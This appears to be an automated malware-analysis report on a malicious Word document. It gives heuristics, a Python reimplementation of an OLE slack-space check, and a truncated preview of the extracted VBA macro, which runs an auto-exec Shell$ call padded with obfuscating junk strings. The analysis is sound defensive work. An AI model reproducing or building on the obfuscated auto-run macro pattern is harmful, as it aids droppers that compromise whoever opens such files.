Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
The file contains a malicious VBA macro whose AutoOpen subroutine calls VBA.Shell$, so a command is executed as soon as the document is opened (T1059.005). The argument to Shell is the bare identifier GroQSZEWTizL, which is neither assigned nor defined anywhere in the visible preview; it is presumably a variable or function built in the truncated remainder of the module, so the command line itself could not be recovered here. The surrounding Array(UCase("..." + "...")) statements are dead-code padding. Such a Shell call is most often used to fetch and run a second-stage payload, but the preview does not show the command. The extracted URL http://jAu+jAugjAu has a "+" in its host part, which is not a valid hostname character, so it is more plausibly residue of the same random-string obfuscation matched by the URL extractor than a reachable payload server; the second URL is a standard OOXML schema namespace. Neither is a reliable download indicator. The ClamAV detection Img.Dropper.PhishingLure-6443153-0 and the OLE_SLACK_ANOMALY finding (79,820 bytes outside any declared stream) independently support the malicious verdict. Note that the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic reports that no modern VBA project was recovered, which conflicts with the macros.bas artifact olevba extracted below; treat that finding as secondary.
Heuristics (8)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 183,808 bytes but its declared streams total only 103,988 bytes; 79,820 bytes (43%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://jAu+jAugjAu (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
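The OLE_SLACK_ANOMALY heuristic compares the file size with what the compound-file structures account for. The following is an added example (my own code, not the analyzer's) that reimplements that check from the CFB layout alone, without olefile: it reads the DIFAT and FAT, walks the directory chain summing the sizes of stream entries, and counts every sector that no FAT entry allocates. The input is a constructed minimal compound file built by `build_sample`; the function names and the 25% threshold are assumptions for the illustration.

```python
"""Reproduce the OLE_SLACK_ANOMALY check: compare a compound file's size with
(a) the bytes its directory declares for streams and (b) the sectors its FAT
actually allocates. Added example, not the analyzer's own code; the sample
file built at the bottom is constructed for the demonstration."""
import struct

DIFSECT, FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFC, 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"


def _sector(data, size, sid):
    """Sector sid lives at (sid + 1) * size: the header occupies sector -1."""
    return data[(sid + 1) * size:(sid + 2) * size]


def _u32s(buf):
    buf = buf[:len(buf) // 4 * 4]
    return struct.unpack("<%dI" % (len(buf) // 4), buf)


def ole_accounting(data):
    """Return how much of `data` is reachable via the directory and the FAT."""
    if data[:8] != OLE_MAGIC:
        raise ValueError("not an OLE compound file")
    major = struct.unpack_from("<H", data, 26)[0]
    size = 1 << struct.unpack_from("<H", data, 30)[0]
    n_fat, first_dir = struct.unpack_from("<II", data, 44)
    first_difat, n_difat = struct.unpack_from("<II", data, 68)
    # FAT sector list: 109 ids in the header, then the DIFAT chain for big files
    difat = list(_u32s(data[76:512]))
    sid = first_difat
    while n_difat > 0 and sid < 0xFFFFFFFA:
        chunk = _u32s(_sector(data, size, sid))
        difat.extend(chunk[:-1])          # last entry of a DIFAT sector is the next-sector link
        sid, n_difat = chunk[-1], n_difat - 1
    fat = []
    for fsid in difat[:n_fat]:
        fat.extend(_u32s(_sector(data, size, fsid)))
    # Walk the directory chain, summing the sizes of stream entries (object type 2)
    declared, sid, seen = 0, first_dir, set()
    while sid < len(fat) and sid not in seen:
        seen.add(sid)
        sec = _sector(data, size, sid)
        for off in range(0, len(sec) - 127, 128):
            if sec[off + 66] == 2:
                lo, hi = struct.unpack_from("<II", sec, off + 120)
                declared += lo if major == 3 else (hi << 32) | lo
        sid = fat[sid]
    # Every sector the FAT marks free, or that lies beyond the FAT, is slack
    unallocated, n = 0, 0
    while (n + 1) * size < len(data):
        if n >= len(fat) or fat[n] == FREESECT:
            unallocated += min(size, len(data) - (n + 1) * size)
        n += 1
    return {"file_size": len(data), "declared_stream_bytes": declared,
            "declared_gap": len(data) - declared,      # the report's "79,820 bytes" style figure
            "unallocated_bytes": unallocated,
            "unallocated_ratio": unallocated / len(data)}


def is_slack_anomalous(acct, threshold=0.25):
    """Flag when a quarter or more of the file sits outside any FAT-allocated sector."""
    return acct["unallocated_ratio"] >= threshold


def _dir_entry(buf, off, name, kind, start, size):
    raw = name.encode("utf-16-le") + b"\0\0"
    buf[off:off + len(raw)] = raw
    struct.pack_into("<HB", buf, off + 64, len(raw), kind)
    struct.pack_into("<III", buf, off + 68, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF)  # no siblings/child
    struct.pack_into("<II", buf, off + 116, start, size)


def build_sample(payload, trailing_junk):
    """Constructed minimal v3 file: header, FAT in sector 0, directory in sector 1,
    one stream (<= 512 bytes) in sector 2, then `trailing_junk` appended outside the FAT."""
    ss = 512
    header = bytearray(ss)
    header[0:8] = OLE_MAGIC
    struct.pack_into("<HHHHH", header, 24, 0x3E, 3, 0xFFFE, 9, 6)   # v3, 512-byte sectors
    struct.pack_into("<II", header, 44, 1, 1)                     # 1 FAT sector, directory at 1
    struct.pack_into("<IIIII", header, 56, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", header, 76, 0, *([FREESECT] * 108))
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, ENDOFCHAIN, *([FREESECT] * 125))
    directory = bytearray(ss)
    _dir_entry(directory, 0, "Root Entry", 5, ENDOFCHAIN, 0)
    _dir_entry(directory, 128, "WordDocument", 2, 2, len(payload))
    return bytes(header) + fat + bytes(directory) + payload.ljust(ss, b"\0") + trailing_junk


if __name__ == "__main__":
    for junk in (b"", b"\x90" * 1024):        # clean file, then 1 KiB of bytes no structure references
        acct = ole_accounting(build_sample(b"A" * 100, junk))
        print(acct, "anomalous" if is_slack_anomalous(acct) else "ok")
```

The report's "declared streams total" figure (file size minus the sum of stream sizes) also counts legitimate overhead: the header, FAT and directory sectors and the padding of the last sector of each stream, so a tiny clean file shows a large declared gap while having zero unallocated bytes. Flagging on the FAT-based count is the measure that actually isolates bytes no structure references, which is where a slack-hidden payload would sit.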
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34,623 bytes | a2bcf12ef450eece1e6fa0455ed125cb60f925a18db241f25d3940ff88f6ab60 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "hmWNzfA"
Sub AutoOpen()
' The Array(UCase("..." + "...")) statements are dead code: random-string padding whose results are never used
udJwaCbpSAHpKA = Array(UCase("oYUZFmoOQnUHVf" + "DWYZFHuQlfr" + "CkBMPRsupzdnKG" + "tKGuFKqzl" + "kvmuIjuNr"))
iObEpdllDtkP = Array(UCase("tBFikllLmQufVF" + "hQjaSVk" + "jCEcZFtshUz" + "sCFJcGZrwjYUXk" + "nJKwcJW"))
bjIMGsXNLY = Array(UCase("HiKazMws" + "CikFoAGiWXU" + "WjddTuSzaTNv" + "cacjMkjQ" + "TzvCXFmoqoDbl"))
hwdSdsFjRouMad = Array(UCase("KnnTjNfhRWMMlc" + "sjqcvmiRDX" + "kjGILfIpjAPH" + "jBOMwQj" + "GswKVwiMbV"))
vvdwbILhEwwX = Array(UCase("blsuXVVnrQd" + "JzqjadFffMJGC" + "EkibXKUUjjFno" + "AzDizKR" + "VBdSrszP"))
mrkRkEQtTUp = Array(UCase("GbmpzihIi" + "sVtPhwET" + "WTHSwDoQsnl" + "pbwOZqdrOPG" + "fzOYUXRpAtTuzI"))
' The command string is GroQSZEWTizL, which is neither assigned nor defined anywhere in this preview
VBA.Shell$ GroQSZEWTizL, 0
lLNpUtaCtwBIH = Array(UCase("bMHMJnwpPwV" + "vfwIBOQAsj" + "alDEzUb" + "PKOZjLhqV" + "wvRTzzvFlumrGi"))
LjbFizUndGKhGQ = Array(UCase("UYuGvlkGmGJrjh" + "XEfiUiGknuc" + "oNoQpooa" + "wznJbaozZ" + "kGwiGCbv"))
NoHMTdvsw = Array(UCase("TDvGSaEsVtERk" + "mrBrfhNNt" + "MZpnTffiqJ" + "EoziHCK" + "COvEtab"))
EMQcFJZuslR = Array(UCase("pOVbaHhCBM" + "fDHrHQVvMr" + "aVahzuP" + "mVllQns" + "dmsZbsolYz"))
SdXqEjmnz = Array(UCase("sImnwaC" + "RrDPvrJUScihoI" + "cwbPfhE" + "AsUkdFlfRmr" + "GPChfhjO"))
End Sub
Function XhjTwHsqFVhv()
FbAup = Array(UCase("VQILuJKvMcuuDQ" + "rKBLYsWFLjSDC" + "KvfMHQbm" + "rRzuSZBMjH" + "iFOaJGwKzbcGIn"), UCase("jOivzOE" + "JtawEjJXivGdE" + "EDBSQpuPLpGQ" + "nioIiZREjiIui" + "EtKCJwzJiuhzO"))
' Mid(string, start, length) slices short runs out of longer junk strings: a common way to assemble a command piecewise
WuRFjiLSwS = Mid("NWXnEMczPmoDw nlocFBAzlEHoLui", 14, 3)
NsvwkztJEv = Array(UCase("PFkYTDcpUipA" + "GIXAzwzKwzcW" + "ovSwOnBAHkjNoJ" + "IPLjkKHNRpHwz" + "SHICXOhWXP"), UCase("wjzYnnL" + "KChmsmljiBHHq" + "aocbLQu" + "lrvhlaIp" + "BwHmXlVQPlh"))
BsGWzsW = Array(UCase("uilrnnWtunXDnb" + "VtXmBqVAnz" + "tdztakLXKw" + "QGqRLzXiGJYlIB" + "KMDYhzuT"), UCase("stAMnsQRZYcRvk" + "WdJrKVsqsRZ" + "TlRwVnwYSwKqNt" + "LkYsPcY" + "DoDIYAC"))
YbRQddN = Array(UCase("RWVqAjLIQTtS" + "wMMjdcJOKaL" + "zbvEdTFuHZ" + "rNTTiSibj" + "VdCctmVYSGvKT"), UCase("IQDnAnX" + "YwVVJIavc" + "biiwtcjhkWpSUh" + "TLRPvawQCEGHYc" + "zWiwjkVJ"))
UPzZhC = Mid("PjALUntqtEqiXO", 10, 1)
vUpdTzp = Array(UCase("uNtwjIZH" + "wLMXSSdROjG" + "YKWuiNKRiY" + "PrPdUwaCKQ" + "QQMikVarK"), UCase("vnWCWBzvPp" + "anzjCpIVoivDKu" + "iEcormN" + "TDtawud" + "vbOpdPwh"))
CEcsXMvWAht = Array(UCase("bDTDBdFboa" + "zJjhYiScunUKE" + "YToYzKzCuo" + "HtOZwiTzlPoqw" + "ERtPkGsOfd"), UCase("RCqQsuOr" + "RlECvIBNTHjcr" + "tsEnKiw" + "NkPhcdhsUZwGG" + "NqTbFfvYu"))
fdTpmj = Array(UCase("tsHNZjlEz" + "WYmjjFpzohh" + "SUOOuGrc" + "KTDbQJSAQWkHh" + "YNHFXKMHiilZnw"), UCase("oiNWmMFj" + "TvXwYLzA" + "ZpBmBTSfCoUp" + "WTpbsWkuhTizl" + "mOiTlloNJJB"))
zHLKwaUPYww = Mid("sRaHHAoIz plDTKYvOfvTDwRHFrOZfBzz", 10, 1)
viNkbt = Array(UCase("ZBzXoHEJrYYT" + "OfYjamJiluZfO" + "icTzpqiHbf" + "ENVoOhuu" + "FwhzVlk"), UCase("nGXsZnV" + "YbicEGEsWVZo" + "XNilMOmvTcEGj" + "UIRfazHpGM" + "zzroczLwM"))
FOSSOkuXdd = Array(UCase("uEHJQOSdZEI" + "SaPqsWXnPrfQTV" + "DCIKjZPcfnYC" + "hIChFmAKV" + "VmlOMCYqpvfOaQ"), UCase("bXDwkDUUIGHpwL" + "UYhFnXuKCaGw" + "GjShmniOzMlt" + "RdIFNaf" + "bHjVcWhM"))
lJwYljD = Array(UCase("EdmHjVaJS" + "LZvDYfq" + "ZRjEOzkwEMt" + "DPzjcPH" + "fcdLpQGsYK"), UCase("AjUMDiz" + "nXjROPOww" + "MaJXTzznVPw" + "rXuLtUiDuAcAU" + "vLPwaRK"))
krKDK = Mid("TT kmrNSRWazmZzNAOIRmkmimGwBJFcQVrrbh", 3, 2)
BszmWV = Array(UCase("XdGlNYn" + "CLhSWLwLlF" + "CzNjRaibl" + "JQwCzpIn" + "EEUfKPwpF"), UCase("kKrRQKDKzpLjzC" + "sukQZVnYV" + "MhRCQTl" + "iABSwjstfL" + "EUHSSSUOYjazmV"))
PYSGXV = Array(UCase("LjrcQXOPN" + "PufLWCWtPshL" + "IDTBmYZohibLKU" + "ELofmslaV" + "oNZhBRiAljZz"), UCase("crowiLDzMh" + "pEECYFW" + "wSzKzHfRsLY" + "rGpLnwwDORjb" + "TrzMjbjMvzD"))
XXPbCtwBA = Array(UCase("qiaGhSUEFTbs" + "kKqBRUn" + "VurjqZufi" + "AEdzjvw" + "PLYAYPSfz"), UCase("OJSznSUnjXqtZY" + "TaoblbvCzF" + "uVVbQLbzRZi" + "QLiwMbc" + "lzdFpiELTT"))
ZFIzh = Mid("XaiBYstNeHYjolZkDbRXiokOFzjwWjQNZcqpo", 9, 1)
IvXOfu = Array(UCase("jppCuLoowOi" + "tOaJTPhiV" + "jPiELksYvHm" + "HJHATFvnjEI" + "TRAWtjSUJBIZ"), UCase("qzDwXTacNH" + "CSvbmivbH" + "ltjVfOp" + "WFAhfdFsq" + "khFFKjUa"))
zTFDIT
... (truncated)
```